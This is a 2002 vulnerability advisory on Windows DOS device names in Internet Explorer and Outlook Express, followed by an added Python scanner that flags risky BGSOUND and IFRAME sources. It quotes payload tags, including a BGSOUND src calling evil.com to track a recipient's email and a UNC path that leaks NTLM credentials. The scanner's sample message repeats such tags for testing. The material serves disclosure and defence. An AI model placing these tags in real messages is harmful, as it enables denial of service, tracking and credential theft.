Title: Special device access and DoS in Microsoft Internet Explorer/Outlook Express/Outlook
Authors: ERRor, 3APA3A
Date: May, 14 2002
Affected: Internet Explorer 6.0
Vendor: Microsoft
Risk: Average to high
Remote: Yes
Exploitable: Yes
Vendor notified: April, 24 2002

Intro:

All versions of Windows have reserved filenames that refer to special devices such as prn, aux, nul, etc., also called DOS devices. The filename for a special device may have any directory path and any extension after the dot. For example, c:\temp\prn.tmp refers to the prn device. The same API is used to access special devices and regular files. Unauthorized access to a special device may be a significant security issue with different results: from Denial of Service against a running program or service to hardware failure or compromise of secure data.

Problem:

ERRor discovered that the <BGSOUND> tag in conjunction with a special device name causes DoS against Internet Explorer or Outlook Express regardless of security zone settings. For Outlook Express it is nontrivial to remove the crafted message without losing the message folder.

During investigation of this issue it was found by 3APA3A and ERRor that using the <IFRAME> tag it is possible to send any data to a special device.

Another problem is that regardless of security zone settings the source specified in a <BGSOUND> tag is always downloaded. This makes it possible to fingerprint a remote client by his e-mail using something like <bgsound src="http://evil.com/[email protected]">. The remote client fingerprint problem is discussed in .

A 4th problem (reported by Chad Loder) is that by using a tag like <bgsound src="\\126.96.36.199\new\file.wav"> it is possible to cause IE to establish an external NetBIOS connection. Depending on LMCompatibilityLevel it may cause the user's cleartext password or NTLMv1 challenge to leak. It is a very serious bug.

Exploitation:

You can use  to test DoS against Outlook Express via <BGSOUND>.  will print a text line on a text printer attached to lpt1 in Outlook Express 6.0 via <IFRAME>.

1. Special device access and DoS in Outlook Express
   http://www.security.nnov.ru/search/news.asp?binid=2010
2. Outlook Express Special Device DoS POC
   http://www.security.nnov.ru/files/iedos/dos.eml
3. Outlook Express Special Device access POC
   http://www.security.nnov.ru/files/iedos/print.eml
4. Security risks associated with using e-mail.
   http://www.security.nnov.ru/articles/uninet/

Vendor:

Microsoft was informed on April, 24, 2002. No feedback from vendor since April, 25.
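Added example, not part of the advisory or of the authors' POC files: a Python scanner that applies the Intro's device-name rule (any directory path, any extension) to the src of <BGSOUND> and <IFRAME> tags in an HTML message and labels the three risk classes described in the Problem section: a reserved device name, a UNC path that would trigger an outbound NetBIOS connection, and a remote URL that BGSOUND fetches regardless of zone settings. The regex, the label names, the sample message and the documentation address 192.0.2.10 are constructed for this example; the device set extends the names the advisory lists (prn, aux, nul) with the rest of the standard Win32 set (CON, COM1-9, LPT1-9).

```python
import re
from urllib.parse import urlparse

# Reserved DOS device names. The advisory names prn, aux and nul; CON,
# COM1-9 and LPT1-9 complete the standard Win32 set.
RESERVED_DEVICES = (
    {"con", "prn", "aux", "nul"}
    | {f"com{i}" for i in range(1, 10)}
    | {f"lpt{i}" for i in range(1, 10)}
)


def refers_to_device(path):
    """True if a Windows path names a reserved device.

    As the advisory states, the directory part and the extension do not
    matter: c:\\temp\\prn.tmp still opens the PRN device.
    """
    last = re.split(r"[\\/]", path)[-1]           # final path component
    stem = last.split(".", 1)[0].strip().lower()  # drop extension, normalise
    return stem in RESERVED_DEVICES


# Matches <bgsound ... src=...> and <iframe ... src=...>, quoted or not
# (constructed for this example; not a full HTML parser).
SRC_RE = re.compile(
    r"<\s*(bgsound|iframe)\b[^>]*?\bsrc\s*=\s*([\"']?)([^\"'\s>]+)\2",
    re.IGNORECASE,
)

REMOTE_SCHEMES = {"http", "https", "ftp"}


def classify_src(tag, src):
    """Return a risk label for one src value, or None if it looks harmless."""
    if src.startswith("\\\\"):
        # UNC path: IE would open an outbound NetBIOS connection to the
        # named host, the credential-leak case in the advisory.
        return "unc-path"
    scheme = urlparse(src).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        # Only BGSOUND is fetched regardless of zone settings; that is
        # the remote fingerprinting case.
        return "remote-fetch" if tag == "bgsound" else None
    # file: URLs and bare Windows paths are checked for device names.
    local = urlparse(src).path if scheme == "file" else src
    return "device-name" if refers_to_device(local) else None


def scan_html(html):
    """List (tag, src, label) for every risky BGSOUND/IFRAME src in html."""
    findings = []
    for m in SRC_RE.finditer(html):
        tag, src = m.group(1).lower(), m.group(3)
        label = classify_src(tag, src)
        if label:
            findings.append((tag, src, label))
    return findings


# Constructed sample message body; 192.0.2.10 is a documentation address.
SAMPLE_HTML = r"""<html><body>
<BGSOUND SRC="c:\temp\prn.tmp">
<iframe src="file:///c:/aux.txt"></iframe>
<bgsound src="http://tracker.example/constructed-id.wav">
<bgsound src="\\192.0.2.10\share\file.wav">
<iframe src="http://www.example.org/page.html"></iframe>
<img src="clip.gif">
</body></html>"""

if __name__ == "__main__":
    for tag, src, label in scan_html(SAMPLE_HTML):
        print(f"{label:13} <{tag} src={src!r}>")
```

The same refers_to_device check is the one a file-handling service should apply to any client-supplied filename before calling the file API, since the advisory's point is that the API itself does not distinguish c:\temp\prn.tmp from a regular file.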